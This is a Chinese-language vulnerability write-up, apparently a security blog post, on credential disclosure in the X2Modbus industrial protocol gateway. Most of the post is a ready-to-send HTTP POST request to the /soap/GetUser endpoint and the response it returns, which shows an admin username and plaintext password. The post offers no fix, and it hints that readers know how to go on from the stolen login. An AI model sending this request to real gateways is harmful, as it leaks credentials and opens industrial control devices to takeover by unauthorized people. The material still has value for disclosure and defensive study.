讯饶科技 X2Modbus 敏感信息泄露

讯饶科技 X2Modbus 敏感信息泄露

文章目录

漏洞描述

X2Modbus是一款功能很强大的协议转换网关, 这里的X代表各家不同

的通信协议,2是To的谐音表示转换,Modbus就是最终支持的标准协议

是Modbus协议。使得用户可以根据现场设备的通信协议进行配置,转成

标准的Modbus协议。在PC端仿真运行无误后,上传到硬件协议转换网

关。

在其中存在一个可以getuser的接口,其中就会泄露账号密码等信息

影响版本

不详

实现原理

通过调用getuser接口来获取账号密码信息,从而可以登录后台

漏洞复现

接口在/soap/GetUser构造请求数据包

yaml 复制代码
POST /soap/GetUser  HTTP/1.1
Host: 0.0.0.0
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0/login.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: language=zh-cn; username=admin1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 58


<GetUser><User Name="admin" Password="admin"/></GetUser>

查看返回包

yaml 复制代码
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/xml; charset=utf-8
Set-Cookie: language=zh-cn; username=admin1
Content-Length: 407
<soap:Body>
<GetUserResult>
<UserName>admin</UserName>
<PassWord>admin123456</PassWord>
<Purview>4</Purview>
</GetUserResult>
</soap:Body>
</soap:Envelope>

emmm这里就复现成功了,接下来师傅们懂得

修复建议

暂无

注: 文章只为学习交流安全技术,有人非法盈利后果自行承担

相关推荐
网安INF1 天前
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
java·web安全·网络安全·jenkins·漏洞
扛枪的书生2 天前
AD 横向移动-LSASS 进程转储
windows·渗透·kali·域渗透
网安INF4 天前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
网安INF4 天前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
扛枪的书生5 天前
AD 提权-CVE-2022-26923: CertiFried
windows·渗透·kali·提权·域渗透
网安INF6 天前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞
扛枪的书生8 天前
AD 横向移动-哈希传递攻击
windows·渗透·kali·域渗透
不知几秋9 天前
pikachu通关教程-File Inclusion
漏洞
智云软件测评服务11 天前
网络系统中安全漏洞扫描为何重要?扫描啥?咋扫描?
漏洞·扫描·检测
扛枪的书生13 天前
AD 横向移动-SMB 中继攻击
windows·渗透·kali·域渗透